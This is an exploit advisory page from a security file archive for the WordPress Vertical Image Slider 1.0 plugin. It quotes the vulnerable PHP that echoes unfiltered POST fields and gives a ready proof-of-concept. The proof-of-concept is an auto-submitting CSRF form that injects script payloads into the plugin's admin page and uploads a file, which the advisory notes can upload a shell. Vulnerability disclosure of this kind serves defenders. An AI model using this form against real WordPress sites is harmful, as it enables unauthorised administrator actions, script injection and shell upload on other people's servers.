WordPress Vertical Image Slider 1.0 CSRF / XSS

WordPress Vertical Image Slider 1.0 CSRF / XSS: Posted Sep 19, 2015; Authored by Ehsan Hosseini; WordPress Vertical Image Slider plugin version 1.0 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | 63f064a0c336409406e1795abef613e59a229b155d2c3f25704ac46915950f95; Download | Favorite | View

WordPress Vertical Image Slider 1.0 CSRF / XSS

######################
# Exploit Title : Wordpress Vertical image slider CSRF/XSS
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://wordpress.org/plugins/wp-vertical-image-slider/
# Software Link:  
https://downloads.wordpress.org/plugin/wp-vertical-image-slider.zip
# Date: 2015-08-2
# Version: 1.0
# Tested On : Elementary OS - Firefox
######################
# Vulnerabilities :
- Cross Site Request Forgery (For change the values and upload shell)
- Cross Site Scripting
######################
# Vulnerable Code:
<?php
$title=trim(addslashes($_POST['imagetitle']));
$imageurl=trim($_POST['imageurl']);
?>
...
<input type="text" id="imageurl" class="url"  tabindex="1" size="30"  
name="imageurl" value="<?php echo $image_link; ?>">
<input type="text" id="imagetitle"  tabindex="1" size="30"  
name="imagetitle" value="<?php echo $title;?>">
# it shows the content of imagetitle and imageurl parameter without  
any filters.
######################
# Exploit (CSRF, XSS):
-->

<form method="post" name="form1"  
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"  
enctype="multipart/form-data">
<input type="hidden" name="imagetitle"  
value='"><script>alert("XSS")</script>'>
<input type="hidden" name="imageurl" value='"><script>alert("XSS")</script>'>
<input type="file" name="image_name" />
<input type="submit" name="btnsave" value="Save Changes">
</form>
<script type="text/javascript">
setTimeout('form1.submit()', 1);
</script>

<!--
######################
# Just for upload something by CSRF:
-->
<form method="post"  
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"  
enctype="multipart/form-data">
<input type="file" name="image_name" />
<input type="submit" name="btnsave" value="Save Changes">
</form>


<!--
######################
# Discovered By : Ehsan Hosseini
######################
-->

Top Authors In Last 30 Days

Red Hat 240 files
Ubuntu 63 files
Debian 21 files
LiquidWorm 14 files
Apple 9 files
Gentoo 8 files
Alter Prime 3 files
EQSTLab 2 files
Yehia Elghaly 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,168)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,979)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,006)
UNIX (9,479)
UnixWare (188)
Windows (6,785)
Other

WordPress Vertical Image Slider 1.0 CSRF / XSS

WordPress Vertical Image Slider 1.0 CSRF / XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Vertical Image Slider 1.0 CSRF / XSS

Share This

WordPress Vertical Image Slider 1.0 CSRF / XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems